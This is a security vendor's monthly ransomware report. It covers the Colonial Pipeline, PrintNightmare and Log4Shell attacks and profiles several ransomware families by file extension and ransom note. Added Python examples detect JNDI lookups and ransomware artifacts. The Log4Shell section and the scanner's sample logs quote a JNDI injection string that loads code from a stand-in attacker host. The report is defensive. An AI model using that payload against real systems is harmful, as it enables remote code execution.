Monthly Ransomware Activity – December 2021

Written by: Maor Huli

The ransomware families covered in this December report are:

  1. Rook
  2. BlueLocker
  3. Hello
  4. Makop
  5. BigLock
  6. VoidCrypt
  7. Khonsari

EXECUTIVE SUMMARY

Major Cyber Attacks in 2021

In 2021, the world was confronted with the risks and dangers of cyber attacks. Here are three of the major ones, which took the world by storm:

1. The Colonial Pipeline Ransomware Attack:

The Colonial Pipeline is the largest pipeline system for refined oil products in the United States. Approximately 45% of all fuel consumed on the East Coast of the US originates from it.

The pipeline consists of two tubes and is 5,500 miles (approximately 8,900 kilometers) long. It can carry the astronomical quantity of up to 476,961,884.8 liters of refined oil per day.

On May 7th, 2021, the infamous ransomware group “DarkSide” attacked the Colonial Pipeline.

The group used compromised VPN credentials that were published on the dark web to access the IT system.

The IT network covers everything related to computing technology, such as networking, hardware, software, Internet access, and the people who work with these technologies, including from home. The attackers gained access to a large amount of valuable information, which they stole and encrypted. To contain the attack, the company halted all operations of the pipeline.

With the help of the FBI, Colonial Pipeline paid a ransom of $4.4 million within a few hours of the attack. After payment, the attackers sent the company a decryptor application so it could restore its network. However, the decryption ran very slowly.

2. A Printing Nightmare:

In mid-July, 2021, the Windows Print Spooler service was found to be vulnerable.

The vulnerability allowed RCE (Remote Code Execution) because the service improperly performed privileged operations. An attacker could execute arbitrary code to install applications; read, write, change, and delete files; and even create new accounts with full user rights.

Once malicious commands can be run, deploying ransomware is straightforward, which is exactly what the Vice Society gang did.

This gang usually attacks small and mid-sized organizations, such as public schools, educational institutions, and stores.

They usually perform their attacks with a double-extortion method, which means that while their program encrypts the system, it also steals the data and leaks it to websites located on the dark web.

Microsoft released a final patch for this vulnerability (CVE-2021-34481) on August 10th.

3. Log4Shell Vulnerability:

Log4j is part of the Apache Logging Services. It lets developers record what their software or online services are doing so they can identify errors and other problems, and report them through diagnostic messages to system administrators and users.

In mid-December, an RCE vulnerability was found in the log4j package.

The way Log4j processes log messages is the root cause of this vulnerability. A log message is passed as a string to be recorded in a log file. The Log4j library has an additional feature that allows log messages to contain variables (lookups) that are resolved on the fly before being written to the log file.

The vulnerability resolves a specific argument and loads Java code from another Java class stored on a remote server. When the logged message is controlled by the user, an attacker can abuse this feature so that the argument is resolved into a Java object, and then execute a malicious payload from their remote server via JNDI.

JNDI (Java Naming and Directory Interface) is a directory and naming service that enables users to look up and access Java classes through a variety of naming and directory service SPIs.

When JNDI is used during logging, Java classes can be retrieved from an LDAP (Lightweight Directory Access Protocol) server. In an attack, the lookup is pointed at the attacker's own LDAP server with a single string, for example ${jndi:ldap://attacker.com/path/to/malicious/java/class}.

The Log4j vulnerability, CVE-2021-44228, received the highest possible risk score: 10.

Additional information and a more detailed analysis can be found in the following link:
https://www.cynet.com/log4shell/
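As an added example (not part of the original post), a small Python scanner that flags the JNDI lookup pattern described above in web-server log lines and lists the hosts those lookups would contact, so hits can be correlated with egress logs. The ldaps and rmi schemes are an assumption added beyond the report's ldap example; the log lines are constructed.

```python
import re
from typing import List, NamedTuple

# A JNDI lookup embedded in logged input, e.g. ${jndi:ldap://attacker.com/path}.
# The report's example uses ldap; ldaps and rmi are the other JNDI provider URL
# schemes a defender would flag as well (an assumption added here).
JNDI_LOOKUP = re.compile(
    r"\$\{jndi:(?P<scheme>ldaps?|rmi)://(?P<host>[^/:}\s]+)"
    r"(?::(?P<port>\d+))?(?P<path>[^}\s]*)\}",
    re.IGNORECASE,
)

class Finding(NamedTuple):
    line_no: int   # 1-based line number in the scanned log
    scheme: str    # JNDI provider scheme, lower-cased
    host: str      # server the lookup would contact
    path: str      # object path requested from that server
    raw: str       # the lookup string as it appeared

def scan_log_lines(lines: List[str]) -> List[Finding]:
    """Return one Finding per JNDI lookup string found in the given log lines."""
    findings = []
    for n, line in enumerate(lines, start=1):
        for m in JNDI_LOOKUP.finditer(line):
            findings.append(Finding(n, m["scheme"].lower(), m["host"], m["path"], m.group(0)))
    return findings

def hosts_contacted(findings: List[Finding]) -> set:
    """Distinct hosts the lookups would reach out to, for egress-log correlation."""
    return {f.host for f in findings}

# Constructed web-server access-log lines (not real traffic); the second carries the
# report's example lookup in the User-Agent field, the third one in the query string.
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:10:01:07 +0000] "GET /login HTTP/1.1" 200 88 "-" '
    '"${jndi:ldap://attacker.com/path/to/malicious/java/class}"',
    '10.0.0.7 - - [13/Dec/2021:10:01:09 +0000] "GET /search?q=${jndi:rmi://203.0.113.5:1099/obj}'
    ' HTTP/1.1" 404 0 "-" "curl/7.79"',
]
```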

CYNET 360 VS RANSOMWARE

“Bleeping Computer” is the most up-to-date and reliable website covering the newest ransomware variants. At the Orion team, which is an integral department of Cynet’s research team, we work around the clock to strengthen the detection capabilities of Cynet 360.


ROOK Ransomware

Cynet 360 Detections


ROOK Overview

ROOK ransomware renames the encrypted files with .Rook in the extension:


Once a computer’s files have been encrypted and renamed, it drops a note named HowToRestoreYourFiles.txt.

The ransom note contains links to the attackers' sites on both the dark web and the clear web. It also warns against using third-party software to restore the files.


BlueLocker Ransomware

Cynet 360 Detections


BlueLocker Overview

BlueLocker ransomware renames the encrypted files with a .blue extension for each file:


Once a computer’s files have been encrypted and renamed, it drops a note as a text (.txt) file named restore_file.txt. The text file contains instructions on how to pay to get the encrypted files back.


Hello Ransomware

Cynet 360 Detections


Hello Overview

After execution, Hello ransomware renames the encrypted files with .hello.


Once a computer’s files have been encrypted and renamed, it drops a note as a text (.txt) file named Hello.txt. The text file contains instructions on how to pay to get the encrypted files back.


Makop Ransomware

Cynet 360 Detections


Makop Overview

After execution, Makop ransomware renames the encrypted files with .[0-9A-Z]{8}.[[email protected]].mkp.


Once a computer’s files have been encrypted and renamed, it drops a note as a text (.txt) file named +README-WARNING+.txt. The text file contains instructions on how to pay to get the encrypted files back.


BigLock Ransomware

Cynet 360 Detections


BigLock Overview

Please note that the following information was taken from a third-party source, since no encryption occurred in our lab.

After execution, BigLock ransomware renames the encrypted files with a .pandemic or .corona-lock extension for each file.

Once a computer’s files have been encrypted and renamed, it drops a note as a text (.txt) file named !!!READ_ME!!!.TXT. The text file contains instructions on how to pay to get the encrypted files back.


VoidCrypt Ransomware

Cynet 360 Detections


VoidCrypt Overview

After execution, VoidCrypt ransomware renames the encrypted files with ,(MJ-XD[0-9]{10})([email protected]).wixawm in the extension for each file:


Once a computer’s files have been encrypted and renamed, it drops two notes, a text file and an HTML application, named Decryption-Guide.txt and Decryption-Guide.hta. The notes contain instructions on how to pay to get the encrypted files back.


Khonsari Ransomware

Cynet 360 Detections


Khonsari Overview

Please note that the following information was taken from a third-party resource, since no encryption occurred in our lab.

After execution, Khonsari ransomware renames the encrypted files with .khonsari in the extension for each file.


Once a computer’s files have been encrypted and renamed, it drops a note as a text (.txt) file named HOW TO GET YOUR FILES BACK.TXT. The text file contains instructions on how to pay to get the encrypted files back.


Surtr Ransomware

Cynet 360 Detections


Surtr Overview

After execution, Surtr ransomware renames the encrypted files with .[[email protected]].SURT in the extension for each file.


Once a computer’s files have been encrypted and renamed, it drops a note in two forms, SURTR_README.txt and SURTR_README.hta. The file contains instructions on how to pay to get the encrypted files back.
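The extensions and ransom-note filenames from the Rook through Surtr overviews above, collected into a Python triage helper (an added example, not Cynet's tooling) that classifies a file listing by family and counts encrypted files and notes. The e-mail addresses in the Makop, VoidCrypt and Surtr extensions are elided in the report, so any bracketed address is matched; the listing and the address in it are constructed.

```python
import re
# Filename patterns from this report's overview sections. The report elides the
# e-mail addresses in the Makop, VoidCrypt and Surtr extensions, so a bracketed
# or parenthesised address is matched generically rather than spelled out.
EMAIL = r"[^\]\)]+@[^\]\)]+"
FAMILY_PATTERNS = {
    "Rook": re.compile(r"\.Rook$"),
    "BlueLocker": re.compile(r"\.blue$"),
    "Hello": re.compile(r"\.hello$"),
    "Makop": re.compile(r"\.[0-9A-Z]{8}\.\[" + EMAIL + r"\]\.mkp$"),
    "BigLock": re.compile(r"\.(pandemic|corona-lock)$"),
    "VoidCrypt": re.compile(r"\(MJ-XD[0-9]{10}\)\(" + EMAIL + r"\)\.wixawm$"),
    "Khonsari": re.compile(r"\.khonsari$"),
    "Surtr": re.compile(r"\.\[" + EMAIL + r"\]\.SURT$"),
}
# Ransom-note filenames from the report, lower-cased for a case-insensitive match.
NOTE_FAMILIES = {name.lower(): family for name, family in [
    ("HowToRestoreYourFiles.txt", "Rook"), ("restore_file.txt", "BlueLocker"),
    ("Hello.txt", "Hello"), ("+README-WARNING+.txt", "Makop"),
    ("!!!READ_ME!!!.TXT", "BigLock"), ("Decryption-Guide.txt", "VoidCrypt"),
    ("Decryption-Guide.hta", "VoidCrypt"), ("HOW TO GET YOUR FILES BACK.TXT", "Khonsari"),
    ("SURTR_README.txt", "Surtr"), ("SURTR_README.hta", "Surtr")]}

def classify(path):
    """Return (family, 'note' or 'encrypted') for one path, or None if nothing matches."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1]
    family = NOTE_FAMILIES.get(name.lower())
    if family:
        return family, "note"
    for family, pattern in FAMILY_PATTERNS.items():
        if pattern.search(name):
            return family, "encrypted"
    return None

def triage(paths):
    """Count encrypted files and ransom notes per family across a file listing."""
    summary = {}
    for path in paths:
        hit = classify(path)
        if hit:
            family, kind = hit
            summary.setdefault(family, {"encrypted": 0, "note": 0})[kind] += 1
    return summary
# Constructed file listing for a dry run; the address is a placeholder, not an IoC.
SAMPLE_LISTING = [
    r"C:\Users\alice\Documents\budget.xlsx.Rook",
    r"C:\Users\alice\Documents\HowToRestoreYourFiles.txt",
    r"C:\Users\alice\Pictures\holiday.jpg.A1B2C3D4.[helpdesk@example.com].mkp",
    r"C:\Users\alice\Pictures\+README-WARNING+.txt",
    r"D:\share\report.docx.[helpdesk@example.com].SURT",
]
```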
